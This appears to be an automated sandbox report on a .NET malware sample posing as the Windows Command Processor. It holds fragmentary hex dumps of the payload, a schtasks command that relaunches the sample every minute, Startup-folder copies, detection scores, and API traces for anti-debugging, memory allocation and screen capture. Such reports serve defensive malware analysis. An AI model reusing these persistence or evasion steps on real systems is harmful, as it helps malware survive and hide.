cc c0 c1 b5 ff 0b 38 83 b8 14 2e 63 62 07 93 b1 9c 37 dc 50 ec a7 51 eb 4e 93
                      Data Ascii: !Ngi^y&:bj)fWCU_$fx{7Pc$N@tt;.Jd9iedkp0i0GwK=t*z+dB.%CVS bkxidJx4Kt!#Sljm_lwsojSj~y<xxG*zx\$&8.cb7PQN
                      2023-10-24 07:28:52 UTC93INData Raw: e4 57 9d 35 07 03 e9 3d b9 87 d9 63 8f fd e2 9f 28 eb 10 01 79 2f e1 b0 27 41 6b 5c 0c 65 55 d5 c7 60 bf c2 0d e0 ec de cf 76 24 be 87 93 fa 90 ee 6f 5f 58 6a ec cd b5 75 ec 0d c6 8d 31 53 31 04 9c 2f 3e 1f 91 8f 8b 8f fe 32 32 02 0b 22 28 94 46 da 6d 9d 06 fd 6a db 92 09 4d 21 d3 26 46 41 45 d0 8c 83 f7 ca 52 cf dd 17 59 37 ba ca aa 52 c3 79 7f bd 20 94 4c 34 99 c0 9d 34 d2 70 74 d8 ec f0 bd 3a 96 a4 9c 7c 88 9e bf ef a4 32 21 c7 5f fa 5d 59 a7 88 21 b1 84 58 ea 36 2d 1d fc b2 9d 98 91 b9 95 9a 95 93 91 86 a7 84 98 9d 80 a2 80 4b c9 0d 6f bc 1f dc 02 34 82 ef c0 c5 cc e4 c8 c7 c8 ce cc db fa d9 c5 c0 dd 5c 90 66 9f d5 d4 d8 13 1b 31 63 cf 0c b5 3e ba 66 4e 6a a1 52 4d 23 e7 57 ba f0 3d 3d 7c a4 54 9e dc 27 c7 83 96 58 49 23 59 87 4f e7 fa 01 b9 7e 65 76
                      Data Ascii: W5=c(y/'Ak\eU`v$o_Xju1S1/>22"(FmjM!&FAERY7Ry L44pt:|2!_]Y!X6-Ko4\f1c>fNjRM#W==|T'XI#YO~ev
                      2023-10-24 07:28:52 UTC97INData Raw: 17 00 00 23 7e 00 00 b4 17 00 00 64 17 00 00 23 53 74 72 69 6e 67 73 00 00 00 00 18 2f 00 00 9c 00 00 00 23 55 53 00 b4 2f 00 00 10 00 00 00 23 47 55 49 44 00 00 00 c4 2f 00 00 04 0c 00 00 23 42 6c 6f 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 0a 57 35 a2 1d 09 0f 00 00 00 fa 01 33 00 16 00 00 01 00 00 00 a0 00 00 00 11 00 00 00 3f 00 00 00 66 00 00 00 02 00 00 00 4f 01 00 00 33 00 00 00 02 00 00 00 38 00 00 00 03 00 00 00 06 00 00 00 07 00 00 00 05 00 00 00 0a 00 00 00 07 00 00 00 01 00 00 00 06 00 00 00 01 00 00 00 04 00 00 00 03 00 00 00 02 00 00 00 00 00 01 00 01 00 00 00 00 00 0a 00 d3 00 dc 00 0a 00 fb 00 2e 00 0a 00 0e 01 1e 01 0a 00 35 01 3e 01 0a 00 5c 01 63 01 0a 00 a1 01 63 01 0a 00 ac 01 2e 00 0a 00 b6 01 2e 00 0a 00 d5 01 2e 00
                      Data Ascii: #~d#Strings/#US/#GUID/#BlobW53?fO38.5>\cc...
                      2023-10-24 07:28:52 UTC100INData Raw: 01 00 00 00 16 00 2a 16 de 0a 03 00 f0 15 01 00 00 00 16 00 50 16 fb 0a 03 00 3c 16 01 00 00 00 96 00 b3 00 d7 02 03 00 00 20 02 00 00 00 00 20 04 00 00 00 09 00 ee 00 1e 00 11 00 02 01 22 00 19 00 2f 01 28 00 21 00 4a 01 42 00 21 00 53 01 47 00 09 00 6d 01 5f 00 09 00 82 01 64 00 29 00 9c 01 6a 00 29 00 b1 01 71 00 41 00 c3 01 79 00 21 00 cb 01 80 00 61 00 2f 01 a5 00 69 00 2f 01 a1 00 71 00 2f 01 dc 00 81 00 2f 01 a1 00 89 00 2f 01 a1 00 0c 00 2f 01 a1 00 14 00 2f 01 a1 00 1c 00 2f 01 a1 00 24 00 2f 01 a1 00 0c 00 b3 00 35 01 14 00 b3 00 35 01 1c 00 b3 00 35 01 24 00 b3 00 35 01 a1 00 2f 01 a5 00 a9 00 2f 01 a1 00 b1 00 2f 01 a1 00 b9 00 2f 01 a1 00 2c 00 b3 00 b7 01 c1 00 c4 03 ca 01 91 00 2f 01 a1 00 c9 00 2f 01 da 01 d1 00 35 04 e9 01 91 00 44 04 ee
                      Data Ascii: *P< "/(!JB!SGm_d)j)qAy!a/i/q//////$/555$5////,//5D
                      2023-10-24 07:28:52 UTC104INData Raw: 61 74 68 00 47 65 74 50 61 74 68 52 6f 6f 74 00 44 72 69 76 65 49 6e 66 6f 00 67 65 74 5f 54 6f 74 61 6c 53 69 7a 65 00 43 6f 6e 63 61 74 00 50 72 6f 6a 65 63 74 44 61 74 61 00 53 65 74 50 72 6f 6a 65 63 74 45 72 72 6f 72 00 45 78 63 65 70 74 69 6f 6e 00 55 49 6e 74 36 34 00 43 6c 65 61 72 50 72 6f 6a 65 63 74 45 72 72 6f 72 00 53 74 72 69 6e 67 42 75 69 6c 64 65 72 00 4d 44 35 43 72 79 70 74 6f 53 65 72 76 69 63 65 50 72 6f 76 69 64 65 72 00 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 00 67 65 74 5f 41 53 43 49 49 00 48 61 73 68 41 6c 67 6f 72 69 74 68 6d 00 43 6f 6d 70 75 74 65 48 61 73 68 00 41 70 70 65 6e 64 00 53 75 62 73 74 72 69 6e 67 00 54 6f 55 70 70 65 72 00 43 6f 6e 76 65 72 74 00 46 72 6f 6d 42 61 73 65
                      Data Ascii: athGetPathRootDriveInfoget_TotalSizeConcatProjectDataSetProjectErrorExceptionUInt64ClearProjectErrorStringBuilderMD5CryptoServiceProviderSystem.Security.Cryptographyget_ASCIIHashAlgorithmComputeHashAppendSubstringToUpperConvertFromBase
                      2023-10-24 07:28:52 UTC108INData Raw: 74 48 64 63 00 52 65 6c 65 61 73 65 48 64 63 00 43 75 72 73 6f 72 73 00 67 65 74 5f 50 6f 73 69 74 69 6f 6e 00 44 72 61 77 00 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 45 6e 63 6f 64 65 72 00 51 75 61 6c 69 74 79 00 67 65 74 5f 50 61 72 61 6d 00 43 61 70 74 75 72 65 00 47 65 74 49 6d 61 67 65 45 6e 63 6f 64 65 72 73 00 67 65 74 5f 4d 69 6d 65 54 79 70 65 00 47 65 74 45 6e 63 6f 64 65 72 49 6e 66 6f 00 41 73 73 65 6d 62 6c 79 44 65 73 63 72 69 70 74 69 6f 6e 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 50 72 6f 64 75 63 74 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 54 72 61 64 65 6d 61 72 6b 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 54 69 74 6c 65 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 43 6f 6d 70 61 6e 79 41
                      Data Ascii: tHdcReleaseHdcCursorsget_PositionDrawop_InequalityEncoderQualityget_ParamCaptureGetImageEncodersget_MimeTypeGetEncoderInfoAssemblyDescriptionAttributeAssemblyProductAttributeAssemblyTrademarkAttributeAssemblyTitleAttributeAssemblyCompanyA
                      2023-10-24 07:28:52 UTC113INData Raw: 00 6e 00 00 00 00 00 00 00 b0 04 0c 03 00 00 01 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 00 00 e8 02 00 00 01 00 30 00 30 00 30 00 30 00 30 00 34 00 62 00 30 00 00 00 4c 00 16 00 01 00 43 00 6f 00 6d 00 70 00 61 00 6e 00 79 00 4e 00 61 00 6d 00 65 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 43 00 6f 00 72 00 70 00 6f 00 72 00 61 00 74 00 69 00 6f 00 6e 00 00 00 5c 00 1a 00 01 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e 00 00 00 00 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 20 00 50 00 72 00 6f 00 63 00 65 00 73 00 73 00 6f 00 72 00 00 00 40 00 0f 00 01 00 46 00 69 00 6c 00 65 00 56 00
                      Data Ascii: nStringFileInfo000004b0LCompanyNameMicrosoft Corporation\FileDescriptionWindows Command Processor@FileV


                      Target ID:0
                      Start time:09:28:50
                      Start date:24/10/2023
                      Path:C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
                      Imagebase:0xb80000
                      File size:283'648 bytes
                      MD5 hash:D88092AABD3AF3BA4EF626C31962626E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:low
                      Has exited:true

                      Target ID:2
                      Start time:09:28:52
                      Start date:24/10/2023
                      Path:C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr" /S
                      Imagebase:0x440000
                      File size:116'224 bytes
                      MD5 hash:2F621D531B27FF6BCF35DB5412A879BF
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Antivirus matches:
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 91%, ReversingLabs
                      • Detection: 51%, Virustotal, Browse
                      Reputation:low
                      Has exited:false

                      Target ID:3
                      Start time:09:28:54
                      Start date:24/10/2023
                      Path:C:\Windows\System32\schtasks.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ" /tr "C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
                      Imagebase:0x7ff713a70000
                      File size:235'008 bytes
                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      Target ID:4
                      Start time:09:28:55
                      Start date:24/10/2023
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:7
                      Start time:09:29:10
                      Start date:24/10/2023
                      Path:C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr" /S
                      Imagebase:0x4e0000
                      File size:116'224 bytes
                      MD5 hash:2F621D531B27FF6BCF35DB5412A879BF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:.Net C# or VB.NET
                      Antivirus matches:
                      • Detection: 91%, ReversingLabs
                      • Detection: 51%, Virustotal, Browse
                      Reputation:low
                      Has exited:true

                      Target ID:8
                      Start time:09:29:26
                      Start date:24/10/2023
                      Path:C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr" /S
                      Imagebase:0x140000
                      File size:116'224 bytes
                      MD5 hash:2F621D531B27FF6BCF35DB5412A879BF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:.Net C# or VB.NET
                      Reputation:low
                      Has exited:true

                      Target ID:9
                      Start time:09:29:34
                      Start date:24/10/2023
                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr" /S
                      Imagebase:0xac0000
                      File size:116'224 bytes
                      MD5 hash:2F621D531B27FF6BCF35DB5412A879BF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:.Net C# or VB.NET
                      Antivirus matches:
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 91%, ReversingLabs
                      • Detection: 51%, Virustotal, Browse
                      Reputation:low
                      Has exited:true

                      Target ID:13
                      Start time:09:30:01
                      Start date:24/10/2023
                      Path:C:\Windows\SysWOW64\WerFault.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 2696
                      Imagebase:0x2f0000
                      File size:483'680 bytes
                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:high
                      Has exited:true

                        Execution Graph

                        Execution Coverage:23.1%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:15.5%
                        Total number of Nodes:278
                        Total number of Limit Nodes:15
                        execution_graph 35018 13fd01c 35019 13fd034 35018->35019 35020 13fd08e 35019->35020 35028 2ddb8b5 35019->35028 35032 2ddd728 35019->35032 35036 2ddd718 35019->35036 35040 2ddb8cc 35019->35040 35044 2ddd850 35019->35044 35048 9ac1670 35019->35048 35056 9ac16a0 35019->35056 35029 2ddb8c5 35028->35029 35064 2ddb904 35029->35064 35031 2ddd867 35031->35020 35033 2ddd74e 35032->35033 35034 2ddb8cc GetModuleHandleW 35033->35034 35035 2ddd75a 35034->35035 35035->35020 35037 2ddd728 35036->35037 35038 2ddb8cc GetModuleHandleW 35037->35038 35039 2ddd75a 35038->35039 35039->35020 35041 2ddb8d7 35040->35041 35042 2ddb904 GetModuleHandleW 35041->35042 35043 2ddd867 35042->35043 35043->35020 35045 2ddd860 35044->35045 35046 2ddb904 GetModuleHandleW 35045->35046 35047 2ddd867 35046->35047 35047->35020 35049 9ac1675 35048->35049 35050 9ac1701 35049->35050 35052 9ac16f1 35049->35052 35102 9ac0714 35050->35102 35053 9ac16ff 35052->35053 35092 9ac1828 35052->35092 35097 9ac1818 35052->35097 35059 9ac16cd 35056->35059 35057 9ac1701 35058 9ac0714 CallWindowProcW 35057->35058 35060 9ac16ff 35058->35060 35059->35057 35061 9ac16f1 35059->35061 35061->35060 35062 9ac1828 CallWindowProcW 35061->35062 35063 9ac1818 CallWindowProcW 35061->35063 35062->35060 35063->35060 35065 2ddb90f 35064->35065 35066 2ddd937 35065->35066 35088 2ddb520 35065->35088 35068 2ddd994 35066->35068 35070 2ddb904 GetModuleHandleW 35066->35070 35072 2ddb8f8 35066->35072 35080 2ddd870 35066->35080 35068->35031 35070->35068 35073 2ddb8fd 35072->35073 35074 2ddd937 35073->35074 35075 2ddb520 GetModuleHandleW 35073->35075 35076 2ddd994 35074->35076 35077 2ddb8f8 GetModuleHandleW 35074->35077 35078 2ddb904 GetModuleHandleW 35074->35078 35079 2ddd870 GetModuleHandleW 35074->35079 35075->35074 35076->35068 35077->35076 35078->35076 35079->35076 35081 2ddd880 35080->35081 35082 2ddd937 35081->35082 35083 2ddb520 GetModuleHandleW 35081->35083 35084 2ddd994 35082->35084 35085 2ddb8f8 GetModuleHandleW 
35082->35085 35086 2ddb904 GetModuleHandleW 35082->35086 35087 2ddd870 GetModuleHandleW 35082->35087 35083->35082 35084->35068 35085->35084 35086->35084 35087->35084 35089 2ddce40 GetModuleHandleW 35088->35089 35091 2ddceb5 35089->35091 35091->35066 35093 9ac1836 35092->35093 35094 9ac183e 35093->35094 35095 9ac0714 CallWindowProcW 35093->35095 35094->35053 35096 9ac187c 35095->35096 35096->35053 35098 9ac1836 35097->35098 35099 9ac183e 35098->35099 35100 9ac0714 CallWindowProcW 35098->35100 35099->35053 35101 9ac187c 35100->35101 35101->35053 35103 9ac071f 35102->35103 35104 9ac18d9 35103->35104 35105 9ac192a CallWindowProcW 35103->35105 35104->35053 35105->35104 34995 144ee00 34996 144ee3f CheckRemoteDebuggerPresent 34995->34996 34997 144ee6b 34996->34997 35106 9ac0848 35107 9ac088e GetCurrentProcess 35106->35107 35109 9ac08d9 35107->35109 35110 9ac08e0 GetCurrentThread 35107->35110 35109->35110 35111 9ac091d GetCurrentProcess 35110->35111 35112 9ac0916 35110->35112 35113 9ac0953 35111->35113 35112->35111 35118 9ac0df9 35113->35118 35120 9ac0a17 35113->35120 35114 9ac097b GetCurrentThreadId 35115 9ac09ac 35114->35115 35119 9ac0dfe 35118->35119 35119->35114 35124 9ac0a89 DuplicateHandle 35120->35124 35126 9ac0a90 DuplicateHandle 35120->35126 35121 9ac0a56 35121->35114 35125 9ac0b26 35124->35125 35125->35121 35127 9ac0b26 35126->35127 35127->35121 34998 2dd0798 34999 2dd07db MapViewOfFile 34998->34999 35000 2dd0812 34999->35000 35128 2dd50b8 35130 2dd50cd 35128->35130 35129 2dd5179 35130->35129 35134 2dd53f8 35130->35134 35137 2dd53f0 35130->35137 35131 2dd522d 35135 2dd543b VirtualAlloc 35134->35135 35136 2dd546f 35135->35136 35136->35131 35138 2dd53f8 VirtualAlloc 35137->35138 35140 2dd546f 35138->35140 35140->35131 35001 2dd0850 35002 2dd0891 FindCloseChangeNotification 35001->35002 35003 2dd08be 35002->35003 35141 2dd0ab0 35142 2dd0ab9 VirtualProtect 35141->35142 35144 2dd0b32 35142->35144 35145 2ddfcb0 35146 2ddffb8 35145->35146 35148 2ddfcd8 35145->35148 
35147 2ddfce1 35148->35147 35152 144ff20 35148->35152 35157 144ff30 35148->35157 35149 2ddfd04 35153 144ff23 35152->35153 35154 144ff1b 35152->35154 35153->35154 35162 9acfea8 35153->35162 35165 9acfeb0 OleInitialize 35153->35165 35154->35149 35158 144ff3b 35157->35158 35159 144ff4b 35158->35159 35160 9acfea8 OleInitialize 35158->35160 35161 9acfeb0 OleInitialize 35158->35161 35159->35149 35160->35159 35161->35159 35163 9acfeaf OleInitialize 35162->35163 35164 9acff13 35162->35164 35163->35164 35164->35154 35166 9acff14 35165->35166 35166->35154 35167 2dd8170 35168 2dd8196 35167->35168 35169 2dd823a 35168->35169 35172 2dd8468 35168->35172 35176 2dd8457 35168->35176 35174 2dd8496 35172->35174 35173 2dd8521 35173->35173 35174->35173 35180 2dd802c 35174->35180 35178 2dd8468 35176->35178 35177 2dd8521 35177->35177 35178->35177 35179 2dd802c 3 API calls 35178->35179 35179->35177 35181 2dd8037 35180->35181 35183 2ddb967 35181->35183 35184 2ddb4c0 35181->35184 35183->35173 35186 2ddb4cb 35184->35186 35185 2ddba31 35185->35183 35186->35185 35189 2ddc3d0 35186->35189 35195 2ddc3c0 35186->35195 35190 2ddc3fb 35189->35190 35201 2ddc994 35190->35201 35191 2ddc47e 35192 2ddc4aa 35191->35192 35193 2ddb520 GetModuleHandleW 35191->35193 35192->35192 35193->35192 35196 2ddc3d0 35195->35196 35200 2ddc994 3 API calls 35196->35200 35197 2ddc47e 35198 2ddb520 GetModuleHandleW 35197->35198 35199 2ddc4aa 35197->35199 35198->35199 35200->35197 35202 2ddc9cd 35201->35202 35203 2ddca4e 35202->35203 35206 2ddcb10 35202->35206 35219 2ddcb00 35202->35219 35207 2ddcb25 35206->35207 35208 2ddb520 GetModuleHandleW 35207->35208 35209 2ddcb49 35207->35209 35208->35209 35210 2ddb520 GetModuleHandleW 35209->35210 35218 2ddcd05 35209->35218 35212 2ddcc8b 35210->35212 35211 2ddcd60 35211->35203 35212->35211 35215 2ddb520 GetModuleHandleW 35212->35215 35212->35218 35213 2ddce88 GetModuleHandleW 35214 2ddceb5 35213->35214 35214->35203 35216 2ddccd9 35215->35216 35217 2ddb520 GetModuleHandleW 35216->35217 
35216->35218 35217->35218 35218->35203 35218->35211 35218->35213 35220 2ddcb10 35219->35220 35221 2ddb520 GetModuleHandleW 35220->35221 35222 2ddcb49 35220->35222 35221->35222 35223 2ddb520 GetModuleHandleW 35222->35223 35231 2ddcd05 35222->35231 35225 2ddcc8b 35223->35225 35224 2ddcd60 35224->35203 35225->35224 35228 2ddb520 GetModuleHandleW 35225->35228 35225->35231 35226 2ddce88 GetModuleHandleW 35227 2ddceb5 35226->35227 35227->35203 35229 2ddccd9 35228->35229 35230 2ddb520 GetModuleHandleW 35229->35230 35229->35231 35230->35231 35231->35203 35231->35224 35231->35226 35232 2ddd570 35233 2ddd5d8 CreateWindowExW 35232->35233 35235 2ddd694 35233->35235 35236 2dd5570 35237 2dd55b3 VirtualFree 35236->35237 35238 2dd55e4 35237->35238 35239 9ac565f 35240 9ac561e 35239->35240 35241 9ac566e 35239->35241 35244 9ac5220 35240->35244 35243 9ac562d 35243->35243 35245 9ac522b 35244->35245 35246 9ac5df9 35245->35246 35249 9ac6dc0 35245->35249 35254 9ac6db0 35245->35254 35246->35243 35250 9ac6de1 35249->35250 35251 9ac6e05 35250->35251 35259 9ac6f60 35250->35259 35263 9ac6f70 35250->35263 35251->35246 35255 9ac6de1 35254->35255 35256 9ac6e05 35255->35256 35257 9ac6f60 5 API calls 35255->35257 35258 9ac6f70 5 API calls 35255->35258 35256->35246 35257->35256 35258->35256 35260 9ac6f7d 35259->35260 35261 9ac6fb6 35260->35261 35267 9ac58dc 35260->35267 35261->35251 35265 9ac6f7d 35263->35265 35264 9ac6fb6 35264->35251 35265->35264 35266 9ac58dc 5 API calls 35265->35266 35266->35264 35268 9ac58e7 35267->35268 35270 9ac7028 35268->35270 35271 9ac5910 35268->35271 35270->35270 35272 9ac591b 35271->35272 35278 9ac5920 35272->35278 35274 9ac7097 35282 9acbef0 35274->35282 35290 9acbed8 35274->35290 35275 9ac70d1 35275->35270 35281 9ac592b 35278->35281 35279 9ac8098 35279->35274 35280 9ac6dc0 5 API calls 35280->35279 35281->35279 35281->35280 35283 9acbf11 35282->35283 35285 9acbf2d 35283->35285 35298 9acc168 35283->35298 35301 9acc158 35283->35301 35284 9acbf6d 35288 2ddc3d0 3 API calls 
35284->35288 35289 2ddc3c0 3 API calls 35284->35289 35285->35275 35288->35285 35289->35285 35291 9acbee2 35290->35291 35293 9acbf2d 35291->35293 35294 9acc168 5 API calls 35291->35294 35295 9acc158 5 API calls 35291->35295 35292 9acbf6d 35296 2ddc3d0 3 API calls 35292->35296 35297 2ddc3c0 3 API calls 35292->35297 35293->35275 35294->35292 35295->35292 35296->35293 35297->35293 35305 9acc19b 35298->35305 35299 9acc172 35299->35284 35302 9acc168 35301->35302 35304 9acc19b 5 API calls 35302->35304 35303 9acc172 35303->35284 35304->35303 35306 9acc1b9 35305->35306 35309 9acc1dc 35305->35309 35312 2ddcb10 2 API calls 35306->35312 35313 2ddcb00 2 API calls 35306->35313 35314 2ddb520 GetModuleHandleW 35306->35314 35317 2ddce38 35306->35317 35307 9acc1c4 35307->35309 35316 9acc19b 5 API calls 35307->35316 35321 9acc398 35307->35321 35308 9acc1d4 35308->35309 35325 9acb17c 35308->35325 35309->35299 35312->35307 35313->35307 35314->35307 35316->35308 35318 2ddce40 GetModuleHandleW 35317->35318 35320 2ddceb5 35318->35320 35320->35307 35323 9acc3ac 35321->35323 35322 9acc3d1 35322->35308 35323->35322 35324 9acb17c LoadLibraryExW 35323->35324 35324->35322 35326 9acc3f8 LoadLibraryExW 35325->35326 35328 9acc471 35326->35328 35328->35309 35329 144f030 35330 144f03e NtQueryInformationProcess 35329->35330 35332 144f0cc 35330->35332 35004 2dd06c8 35005 2dd0710 CreateFileMappingW 35004->35005 35007 2dd075c 35005->35007 35008 9ac1af0 SetTimer 35009 9ac1b5c 35008->35009 35010 2dd0400 35011 2dd0448 CreateFileW 35010->35011 35013 2dd0491 35011->35013 35014 2dd6900 35017 2dd6986 GetVolumeInformationA 35014->35017 35016 2dd6be3 35017->35016
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: QY$dla$ "y$"fIx$$~0p$%4:3$+[f$4*$$882+$:*\$;1tu$;N{=$>d=$?1$X$AYp$HF@v$I> _$QH3p$Z_=/$[Q8$^$)]$av(p$b0U$$b0_3$cPvV$gK`$jm5$j.($k<-u$k|^U$m/~l$q,}$u&+&$v(Cn$xl~b${SyZ${S]$|]~l$|uoJ$;!X$M5$S$b:8$drq$iQ7$l{G$x/T
                        • API String ID: 0-3358476858
                        • Opcode ID: ce73b9ae8bee7ef7c48aea4e36016009fd8059b82e9de788cc4c5fd2838c03e7
                        • Instruction ID: 236a9fc900d3b52aa18378620149946ab4f97045224edc57b3f98533245d856c
                        • Opcode Fuzzy Hash: ce73b9ae8bee7ef7c48aea4e36016009fd8059b82e9de788cc4c5fd2838c03e7
                        • Instruction Fuzzy Hash: EFD37B75F002298BCB64DF28C94469AB7B2FB89204F1181EAD90DF7750DB35AE95CF81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: QY$dla$ "y$"fIx$$~0p$%4:3$+[f$4*$$882+$:*\$;1tu$;N{=$>d=$?1$X$AYp$HF@v$I> _$QH3p$Z_=/$[Q8$^$)]$av(p$b0U$$b0_3$cPvV$gK`$jm5$j.($k<-u$k|^U$m/~l$q,}$u&+&$v(Cn$xl~b${SyZ${S]$|]~l$|uoJ$;!X$M5$S$b:8$drq$iQ7$l{G$x/T
                        • API String ID: 0-3358476858
                        • Opcode ID: 62b3749cb1150d79e01a10fc8a7d21b5197d91bd1b6d799620623b014e8b2934
                        • Instruction ID: e07ad927d6ecbec182bfb8b2468aa7659aadcf445d2c36e6bcd0394d8c6ac3ba
                        • Opcode Fuzzy Hash: 62b3749cb1150d79e01a10fc8a7d21b5197d91bd1b6d799620623b014e8b2934
                        • Instruction Fuzzy Hash: A8D37B75F002298BCB64DF28C94469AB7B2FB89204F1181EAD90DF7750DB35AE95CF81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: +569$,aq$Wl9^$iMAl$paq$wa.c$zu;b$>3n$qzQ
                        • API String ID: 0-2802485408
                        • Opcode ID: f4460ad3596c853eab5df3ef5c4a920a0e3db4621275e3792f512e99bf3255a7
                        • Instruction ID: 1cd52214df441f1c4019dd17ef75331101a0bd862b93a9d6c8230404a17e6b32
                        • Opcode Fuzzy Hash: f4460ad3596c853eab5df3ef5c4a920a0e3db4621275e3792f512e99bf3255a7
                        • Instruction Fuzzy Hash: 0DA24F75E00218DFDB58CFAAE894A9DBBB2BF98314F05809AE515AB371DB309D45CF40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2122 144c340-144c364 2123 144c367-144c38d call 14486e0 2122->2123 2127 144c393-144c3b3 2123->2127 2127->2123 2128 144c3b5-144c3c4 2127->2128 2129 144c3c6-144c3e9 2128->2129 2130 144c42a-144c44b 2128->2130 2131 144c3f2-144c419 2129->2131 2132 144c3eb 2129->2132 2133 144c451-144c45d 2130->2133 2134 144c4f2-144c4f8 2130->2134 2138 144c41f-144c425 2131->2138 2139 144c60a-144c692 call 1448608 2131->2139 2132->2131 2132->2134 2135 144c494-144c4f1 call 1448608 2132->2135 2136 144c55c-144c5fc call 1448608 2132->2136 2137 144c6ef-144c6fb 2132->2137 2133->2123 2140 144c463-144c473 2133->2140 2134->2127 2141 144c4fe-144c55b call 1448608 2134->2141 2136->2123 2190 144c602-144c609 2136->2190 2143 144c705-144c758 2137->2143 2144 144c6fd-144c704 2137->2144 2138->2137 2139->2144 2140->2136 2142 144c479-144c486 2140->2142 2142->2123 2145 144c48c-144c48f 2142->2145 2161 144c75a-144c765 call 14485d0 2143->2161 2145->2137 2172 144c794-144c7b4 2161->2172 2173 144c767-144c792 2161->2173 2172->2161 2189 144c7b6-144c7ba 2172->2189 